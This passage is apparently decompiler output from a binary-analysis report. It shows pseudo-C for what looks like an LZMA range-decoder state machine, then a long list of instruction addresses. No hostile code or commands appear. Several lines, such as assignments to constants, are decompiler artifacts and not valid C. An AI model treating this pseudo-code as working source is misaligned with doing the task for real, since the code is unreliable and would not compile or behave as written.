                                                  												goto L54;
                                                  											}
                                                  											L41:
                                                  											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                  											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                  											__ecx =  *(__ebp - 0x58);
                                                  											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                  											 *(__ebp - 0x48) = __eax;
                                                  											__eax = __eax + 1;
                                                  											__eax = __eax << 8;
                                                  											__eax = __eax + __ebx;
                                                  											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  											__ax =  *__esi;
                                                  											 *(__ebp - 0x54) = __esi;
                                                  											__edx = __ax & 0x0000ffff;
                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  												__cx = __ax;
                                                  												 *(__ebp - 0x40) = 1;
                                                  												__cx = __ax >> 5;
                                                  												__eflags = __eax;
                                                  												__ebx = __ebx + __ebx + 1;
                                                  												 *__esi = __ax;
                                                  											} else {
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                  												 *(__ebp - 0x10) = __ecx;
                                                  												0x800 = 0x800 - __edx;
                                                  												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                  												__ebx = __ebx + __ebx;
                                                  												 *__esi = __cx;
                                                  											}
                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  											 *(__ebp - 0x44) = __ebx;
                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                  												goto L39;
                                                  											} else {
                                                  												goto L37;
                                                  											}
                                                  										case 0xe:
                                                  											L46:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0xe;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t156 = __ebp - 0x70;
                                                  											 *_t156 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t156;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											while(1) {
                                                  												L48:
                                                  												__eflags = __ebx - 0x100;
                                                  												if(__ebx >= 0x100) {
                                                  													break;
                                                  												}
                                                  												__eax =  *(__ebp - 0x58);
                                                  												__edx = __ebx + __ebx;
                                                  												__ecx =  *(__ebp - 0x10);
                                                  												__esi = __edx + __eax;
                                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  												__ax =  *__esi;
                                                  												 *(__ebp - 0x54) = __esi;
                                                  												__edi = __ax & 0x0000ffff;
                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  													__cx = __ax;
                                                  													_t170 = __edx + 1; // 0x1
                                                  													__ebx = _t170;
                                                  													__cx = __ax >> 5;
                                                  													__eflags = __eax;
                                                  													 *__esi = __ax;
                                                  												} else {
                                                  													 *(__ebp - 0x10) = __ecx;
                                                  													0x800 = 0x800 - __edi;
                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  													__ebx = __ebx + __ebx;
                                                  													 *__esi = __cx;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  												 *(__ebp - 0x44) = __ebx;
                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                  													continue;
                                                  												} else {
                                                  													goto L46;
                                                  												}
                                                  											}
                                                  											L54:
                                                  											_t173 = __ebp - 0x34;
                                                  											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                  											__eflags =  *_t173;
                                                  											goto L55;
                                                  										case 0xf:
                                                  											L58:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0xf;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t203 = __ebp - 0x70;
                                                  											 *_t203 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t203;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											L60:
                                                  											__eflags = __ebx - 0x100;
                                                  											if(__ebx >= 0x100) {
                                                  												L55:
                                                  												__al =  *(__ebp - 0x44);
                                                  												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                  												goto L56;
                                                  											}
                                                  											L61:
                                                  											__eax =  *(__ebp - 0x58);
                                                  											__edx = __ebx + __ebx;
                                                  											__ecx =  *(__ebp - 0x10);
                                                  											__esi = __edx + __eax;
                                                  											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  											__ax =  *__esi;
                                                  											 *(__ebp - 0x54) = __esi;
                                                  											__edi = __ax & 0x0000ffff;
                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  												__cx = __ax;
                                                  												_t217 = __edx + 1; // 0x1
                                                  												__ebx = _t217;
                                                  												__cx = __ax >> 5;
                                                  												__eflags = __eax;
                                                  												 *__esi = __ax;
                                                  											} else {
                                                  												 *(__ebp - 0x10) = __ecx;
                                                  												0x800 = 0x800 - __edi;
                                                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  												__ebx = __ebx + __ebx;
                                                  												 *__esi = __cx;
                                                  											}
                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  											 *(__ebp - 0x44) = __ebx;
                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                  												goto L60;
                                                  											} else {
                                                  												goto L58;
                                                  											}
                                                  										case 0x10:
                                                  											L109:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0x10;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t365 = __ebp - 0x70;
                                                  											 *_t365 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t365;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											goto L111;
                                                  										case 0x11:
                                                  											L69:
                                                  											__esi =  *(__ebp - 0x58);
                                                  											 *(__ebp - 0x84) = 0x12;
                                                  											while(1) {
                                                  												 *(_t613 - 0x54) = _t606;
                                                  												goto L133;
                                                  											}
                                                  										case 0x12:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												__eax =  *(__ebp - 0x58);
                                                  												 *(__ebp - 0x84) = 0x13;
                                                  												__esi =  *(__ebp - 0x58) + 2;
                                                  												while(1) {
                                                  													 *(_t613 - 0x54) = _t606;
                                                  													goto L133;
                                                  												}
                                                  											}
                                                  											__eax =  *(__ebp - 0x4c);
                                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                  											__ecx =  *(__ebp - 0x58);
                                                  											__eax =  *(__ebp - 0x4c) << 4;
                                                  											__eflags = __eax;
                                                  											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                  											goto L130;
                                                  										case 0x13:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												_t469 = __ebp - 0x58;
                                                  												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                  												__eflags =  *_t469;
                                                  												 *(__ebp - 0x30) = 0x10;
                                                  												 *(__ebp - 0x40) = 8;
                                                  												L144:
                                                  												 *(__ebp - 0x7c) = 0x14;
                                                  												goto L145;
                                                  											}
                                                  											__eax =  *(__ebp - 0x4c);
                                                  											__ecx =  *(__ebp - 0x58);
                                                  											__eax =  *(__ebp - 0x4c) << 4;
                                                  											 *(__ebp - 0x30) = 8;
                                                  											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                  											L130:
                                                  											 *(__ebp - 0x58) = __eax;
                                                  											 *(__ebp - 0x40) = 3;
                                                  											goto L144;
                                                  										case 0x14:
                                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                  											__eax =  *(__ebp - 0x80);
                                                  											 *(_t613 - 0x88) = _t533;
                                                  											goto L1;
                                                  										case 0x15:
                                                  											__eax = 0;
                                                  											__eflags =  *(__ebp - 0x38) - 7;
                                                  											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  											__al = __al & 0x000000fd;
                                                  											__eax = (__eflags >= 0) - 1 + 0xb;
                                                  											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                  											goto L120;
                                                  										case 0x16:
                                                  											__eax =  *(__ebp - 0x30);
                                                  											__eflags = __eax - 4;
                                                  											if(__eax >= 4) {
                                                  												_push(3);
                                                  												_pop(__eax);
                                                  											}
                                                  											__ecx =  *(__ebp - 4);
                                                  											 *(__ebp - 0x40) = 6;
                                                  											__eax = __eax << 7;
                                                  											 *(__ebp - 0x7c) = 0x19;
                                                  											 *(__ebp - 0x58) = __eax;
                                                  											goto L145;
                                                  										case 0x17:
                                                  											L145:
                                                  											__eax =  *(__ebp - 0x40);
                                                  											 *(__ebp - 0x50) = 1;
                                                  											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                  											goto L149;
                                                  										case 0x18:
                                                  											L146:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0x18;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t484 = __ebp - 0x70;
                                                  											 *_t484 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t484;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											L148:
                                                  											_t487 = __ebp - 0x48;
                                                  											 *_t487 =  *(__ebp - 0x48) - 1;
                                                  											__eflags =  *_t487;
                                                  											L149:
                                                  											__eflags =  *(__ebp - 0x48);
                                                  											if( *(__ebp - 0x48) <= 0) {
                                                  												__ecx =  *(__ebp - 0x40);
                                                  												__ebx =  *(__ebp - 0x50);
                                                  												0 = 1;
                                                  												__eax = 1 << __cl;
                                                  												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                  												__eax =  *(__ebp - 0x7c);
                                                  												 *(__ebp - 0x44) = __ebx;
                                                  												while(1) {
                                                  													 *(_t613 - 0x88) = _t533;
                                                  													goto L1;
                                                  												}
                                                  											}
                                                  											__eax =  *(__ebp - 0x50);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  											__eax =  *(__ebp - 0x58);
                                                  											__esi = __edx + __eax;
                                                  											 *(__ebp - 0x54) = __esi;
                                                  											__ax =  *__esi;
                                                  											__edi = __ax & 0x0000ffff;
                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  												__cx = __ax;
                                                  												__cx = __ax >> 5;
                                                  												__eax = __eax - __ecx;
                                                  												__edx = __edx + 1;
                                                  												__eflags = __edx;
                                                  												 *__esi = __ax;
                                                  												 *(__ebp - 0x50) = __edx;
                                                  											} else {
                                                  												 *(__ebp - 0x10) = __ecx;
                                                  												0x800 = 0x800 - __edi;
                                                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  												 *__esi = __cx;
                                                  											}
                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                  												goto L148;
                                                  											} else {
                                                  												goto L146;
                                                  											}
                                                  										case 0x19:
                                                  											__eflags = __ebx - 4;
                                                  											if(__ebx < 4) {
                                                  												 *(__ebp - 0x2c) = __ebx;
                                                  												L119:
                                                  												_t393 = __ebp - 0x2c;
                                                  												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                  												__eflags =  *_t393;
                                                  												L120:
                                                  												__eax =  *(__ebp - 0x2c);
                                                  												__eflags = __eax;
                                                  												if(__eax == 0) {
                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                  													goto L170;
                                                  												}
                                                  												__eflags = __eax -  *(__ebp - 0x60);
                                                  												if(__eax >  *(__ebp - 0x60)) {
                                                  													goto L171;
                                                  												}
                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                  												__eax =  *(__ebp - 0x30);
                                                  												_t400 = __ebp - 0x60;
                                                  												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                  												__eflags =  *_t400;
                                                  												goto L123;
                                                  											}
                                                  											__ecx = __ebx;
                                                  											__eax = __ebx;
                                                  											__ecx = __ebx >> 1;
                                                  											__eax = __ebx & 0x00000001;
                                                  											__ecx = (__ebx >> 1) - 1;
                                                  											__al = __al | 0x00000002;
                                                  											__eax = (__ebx & 0x00000001) << __cl;
                                                  											__eflags = __ebx - 0xe;
                                                  											 *(__ebp - 0x2c) = __eax;
                                                  											if(__ebx >= 0xe) {
                                                  												__ebx = 0;
                                                  												 *(__ebp - 0x48) = __ecx;
                                                  												L102:
                                                  												__eflags =  *(__ebp - 0x48);
                                                  												if( *(__ebp - 0x48) <= 0) {
                                                  													__eax = __eax + __ebx;
                                                  													 *(__ebp - 0x40) = 4;
                                                  													 *(__ebp - 0x2c) = __eax;
                                                  													__eax =  *(__ebp - 4);
                                                  													__eax =  *(__ebp - 4) + 0x644;
                                                  													__eflags = __eax;
                                                  													L108:
                                                  													__ebx = 0;
                                                  													 *(__ebp - 0x58) = __eax;
                                                  													 *(__ebp - 0x50) = 1;
                                                  													 *(__ebp - 0x44) = 0;
                                                  													 *(__ebp - 0x48) = 0;
                                                  													L112:
                                                  													__eax =  *(__ebp - 0x40);
                                                  													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                  														_t391 = __ebp - 0x2c;
                                                  														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                  														__eflags =  *_t391;
                                                  														goto L119;
                                                  													}
                                                  													__eax =  *(__ebp - 0x50);
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  													__eax =  *(__ebp - 0x58);
                                                  													__esi = __edi + __eax;
                                                  													 *(__ebp - 0x54) = __esi;
                                                  													__ax =  *__esi;
                                                  													__ecx = __ax & 0x0000ffff;
                                                  													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                  													__eflags =  *(__ebp - 0xc) - __edx;
                                                  													if( *(__ebp - 0xc) >= __edx) {
                                                  														__ecx = 0;
                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                  														__ecx = 1;
                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                  														__ebx = 1;
                                                  														__ecx =  *(__ebp - 0x48);
                                                  														__ebx = 1 << __cl;
                                                  														__ecx = 1 << __cl;
                                                  														__ebx =  *(__ebp - 0x44);
                                                  														__ebx =  *(__ebp - 0x44) | __ecx;
                                                  														__cx = __ax;
                                                  														__cx = __ax >> 5;
                                                  														__eax = __eax - __ecx;
                                                  														__edi = __edi + 1;
                                                  														__eflags = __edi;
                                                  														 *(__ebp - 0x44) = __ebx;
                                                  														 *__esi = __ax;
                                                  														 *(__ebp - 0x50) = __edi;
                                                  													} else {
                                                  														 *(__ebp - 0x10) = __edx;
                                                  														0x800 = 0x800 - __ecx;
                                                  														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                  														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  														 *__esi = __dx;
                                                  													}
                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                  														L111:
                                                  														_t368 = __ebp - 0x48;
                                                  														 *_t368 =  *(__ebp - 0x48) + 1;
                                                  														__eflags =  *_t368;
                                                  														goto L112;
                                                  													} else {
                                                  														goto L109;
                                                  													}
                                                  												}
                                                  												__ecx =  *(__ebp - 0xc);
                                                  												__ebx = __ebx + __ebx;
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                  												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  												 *(__ebp - 0x44) = __ebx;
                                                  												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                  													__ecx =  *(__ebp - 0x10);
                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                  													__ebx = __ebx | 0x00000001;
                                                  													__eflags = __ebx;
                                                  													 *(__ebp - 0x44) = __ebx;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                  													L101:
                                                  													_t338 = __ebp - 0x48;
                                                  													 *_t338 =  *(__ebp - 0x48) - 1;
                                                  													__eflags =  *_t338;
                                                  													goto L102;
                                                  												} else {
                                                  													goto L99;
                                                  												}
                                                  											}
                                                  											__edx =  *(__ebp - 4);
                                                  											__eax = __eax - __ebx;
                                                  											 *(__ebp - 0x40) = __ecx;
                                                  											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                  											goto L108;
                                                  										case 0x1a:
                                                  											L56:
                                                  											__eflags =  *(__ebp - 0x64);
                                                  											if( *(__ebp - 0x64) == 0) {
                                                  												 *(__ebp - 0x88) = 0x1a;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x68);
                                                  											__al =  *(__ebp - 0x5c);
                                                  											__edx =  *(__ebp - 8);
                                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  											 *( *(__ebp - 0x68)) = __al;
                                                  											__ecx =  *(__ebp - 0x14);
                                                  											 *(__ecx +  *(__ebp - 8)) = __al;
                                                  											__eax = __ecx + 1;
                                                  											__edx = 0;
                                                  											_t192 = __eax %  *(__ebp - 0x74);
                                                  											__eax = __eax /  *(__ebp - 0x74);
                                                  											__edx = _t192;
                                                  											goto L79;
                                                  										case 0x1b:
                                                  											L75:
                                                  											__eflags =  *(__ebp - 0x64);
                                                  											if( *(__ebp - 0x64) == 0) {
                                                  												 *(__ebp - 0x88) = 0x1b;
                                                  												goto L170;
                                                  											}
                                                  											__eax =  *(__ebp - 0x14);
                                                  											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  											__eflags = __eax -  *(__ebp - 0x74);
                                                  											if(__eax >=  *(__ebp - 0x74)) {
                                                  												__eax = __eax +  *(__ebp - 0x74);
                                                  												__eflags = __eax;
                                                  											}
                                                  											__edx =  *(__ebp - 8);
                                                  											__cl =  *(__eax + __edx);
                                                  											__eax =  *(__ebp - 0x14);
                                                  											 *(__ebp - 0x5c) = __cl;
                                                  											 *(__eax + __edx) = __cl;
                                                  											__eax = __eax + 1;
                                                  											__edx = 0;
                                                  											_t274 = __eax %  *(__ebp - 0x74);
                                                  											__eax = __eax /  *(__ebp - 0x74);
                                                  											__edx = _t274;
                                                  											__eax =  *(__ebp - 0x68);
                                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  											_t283 = __ebp - 0x64;
                                                  											 *_t283 =  *(__ebp - 0x64) - 1;
                                                  											__eflags =  *_t283;
                                                  											 *( *(__ebp - 0x68)) = __cl;
                                                  											L79:
                                                  											 *(__ebp - 0x14) = __edx;
                                                  											goto L80;
                                                  										case 0x1c:
                                                  											while(1) {
                                                  												L123:
                                                  												__eflags =  *(__ebp - 0x64);
                                                  												if( *(__ebp - 0x64) == 0) {
                                                  													break;
                                                  												}
                                                  												__eax =  *(__ebp - 0x14);
                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                  													__eflags = __eax;
                                                  												}
                                                  												__edx =  *(__ebp - 8);
                                                  												__cl =  *(__eax + __edx);
                                                  												__eax =  *(__ebp - 0x14);
                                                  												 *(__ebp - 0x5c) = __cl;
                                                  												 *(__eax + __edx) = __cl;
                                                  												__eax = __eax + 1;
                                                  												__edx = 0;
                                                  												_t414 = __eax %  *(__ebp - 0x74);
                                                  												__eax = __eax /  *(__ebp - 0x74);
                                                  												__edx = _t414;
                                                  												__eax =  *(__ebp - 0x68);
                                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                  												__eflags =  *(__ebp - 0x30);
                                                  												 *( *(__ebp - 0x68)) = __cl;
                                                  												 *(__ebp - 0x14) = _t414;
                                                  												if( *(__ebp - 0x30) > 0) {
                                                  													continue;
                                                  												} else {
                                                  													L80:
                                                  													 *(__ebp - 0x88) = 2;
                                                  													goto L1;
                                                  												}
                                                  											}
                                                  											 *(__ebp - 0x88) = 0x1c;
                                                  											goto L170;
                                                  									}
                                                  								}
                                                  								L171:
                                                  								_t535 = _t534 | 0xffffffff;
                                                  								goto L172;
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  			}













                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d39
                                                  0x00406d3f
                                                  0x00406d42
                                                  0x00406d4f
                                                  0x00406d57
                                                  0x004073cb
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d0e
                                                  0x00406d0e
                                                  0x00406d12
                                                  0x0040755d
                                                  0x00000000
                                                  0x0040755d
                                                  0x00406d1e
                                                  0x00406d29
                                                  0x00406d29
                                                  0x00406d29
                                                  0x00406d2c
                                                  0x00406d2f
                                                  0x00406d32
                                                  0x00406d37
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004073ce
                                                  0x004073ce
                                                  0x004073d4
                                                  0x004073da
                                                  0x004073e0
                                                  0x004073fa
                                                  0x004073fd
                                                  0x00407403
                                                  0x0040740e
                                                  0x00407410
                                                  0x004073e2
                                                  0x004073e2
                                                  0x004073f1
                                                  0x004073f5
                                                  0x004073f5
                                                  0x0040741a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d5f
                                                  0x00406d61
                                                  0x00406d64
                                                  0x00406dd5
                                                  0x00406dd8
                                                  0x00406ddb
                                                  0x00406de2
                                                  0x00406dec
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00406d66
                                                  0x00406d6a
                                                  0x00406d6d
                                                  0x00406d6f
                                                  0x00406d72
                                                  0x00406d75
                                                  0x00406d77
                                                  0x00406d7a
                                                  0x00406d7c
                                                  0x00406d81
                                                  0x00406d84
                                                  0x00406d87
                                                  0x00406d8b
                                                  0x00406d92
                                                  0x00406d95
                                                  0x00406d9c
                                                  0x00406da0
                                                  0x00406da8
                                                  0x00406da8
                                                  0x00406da8
                                                  0x00406da2
                                                  0x00406da2
                                                  0x00406da2
                                                  0x00406d97
                                                  0x00406d97
                                                  0x00406d97
                                                  0x00406dac
                                                  0x00406daf
                                                  0x00406dcd
                                                  0x00406dcf
                                                  0x00000000
                                                  0x00406db1
                                                  0x00406db1
                                                  0x00406db4
                                                  0x00406db7
                                                  0x00406dba
                                                  0x00406dbc
                                                  0x00406dbc
                                                  0x00406dbc
                                                  0x00406dbf
                                                  0x00406dc2
                                                  0x00406dc4
                                                  0x00406dc5
                                                  0x00406dc8
                                                  0x00000000
                                                  0x00406dc8
                                                  0x00000000
                                                  0x00406ffe
                                                  0x00407002
                                                  0x00407020
                                                  0x00407023
                                                  0x0040702a
                                                  0x0040702d
                                                  0x00407030
                                                  0x00407033
                                                  0x00407036
                                                  0x00407039
                                                  0x0040703b
                                                  0x00407042
                                                  0x00407043
                                                  0x00407045
                                                  0x00407048
                                                  0x0040704b
                                                  0x0040704e
                                                  0x0040704e
                                                  0x00407053
                                                  0x00000000
                                                  0x00407053
                                                  0x00407004
                                                  0x00407007
                                                  0x0040700a
                                                  0x00407014
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004070ab
                                                  0x004070af
                                                  0x00000000
                                                  0x00000000
                                                  0x004070b5
                                                  0x004070b9
                                                  0x00000000
                                                  0x00000000
                                                  0x004070bf
                                                  0x004070c1
                                                  0x004070c5
                                                  0x004070c5
                                                  0x004070c8
                                                  0x004070cc
                                                  0x00000000
                                                  0x00000000
                                                  0x0040711c
                                                  0x00407120
                                                  0x00407127
                                                  0x0040712a
                                                  0x0040712d
                                                  0x00407137
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00000000
                                                  0x004073cb
                                                  0x004073cb
                                                  0x00407122
                                                  0x00000000
                                                  0x00000000
                                                  0x00407143
                                                  0x00407147
                                                  0x0040714e
                                                  0x00407151
                                                  0x00407154
                                                  0x00407149
                                                  0x00407149
                                                  0x00407149
                                                  0x00407157
                                                  0x0040715a
                                                  0x0040715d
                                                  0x0040715d
                                                  0x00407160
                                                  0x00407163
                                                  0x00407166
                                                  0x00407166
                                                  0x00407169
                                                  0x00407170
                                                  0x00407175
                                                  0x00000000
                                                  0x00000000
                                                  0x00407203
                                                  0x00407203
                                                  0x00407207
                                                  0x004075a5
                                                  0x00000000
                                                  0x004075a5
                                                  0x0040720d
                                                  0x00407210
                                                  0x00407213
                                                  0x00407217
                                                  0x0040721a
                                                  0x00407220
                                                  0x00407222
                                                  0x00407222
                                                  0x00407222
                                                  0x00407225
                                                  0x00407228
                                                  0x00000000
                                                  0x00000000
                                                  0x00406df8
                                                  0x00406df8
                                                  0x00406dfc
                                                  0x00407569
                                                  0x00000000
                                                  0x00407569
                                                  0x00406e02
                                                  0x00406e05
                                                  0x00406e08
                                                  0x00406e0c
                                                  0x00406e0f
                                                  0x00406e15
                                                  0x00406e17
                                                  0x00406e17
                                                  0x00406e17
                                                  0x00406e1a
                                                  0x00406e1d
                                                  0x00406e1d
                                                  0x00406e20
                                                  0x00406e23
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e29
                                                  0x00406e2f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e35
                                                  0x00406e35
                                                  0x00406e39
                                                  0x00406e3c
                                                  0x00406e3f
                                                  0x00406e42
                                                  0x00406e45
                                                  0x00406e46
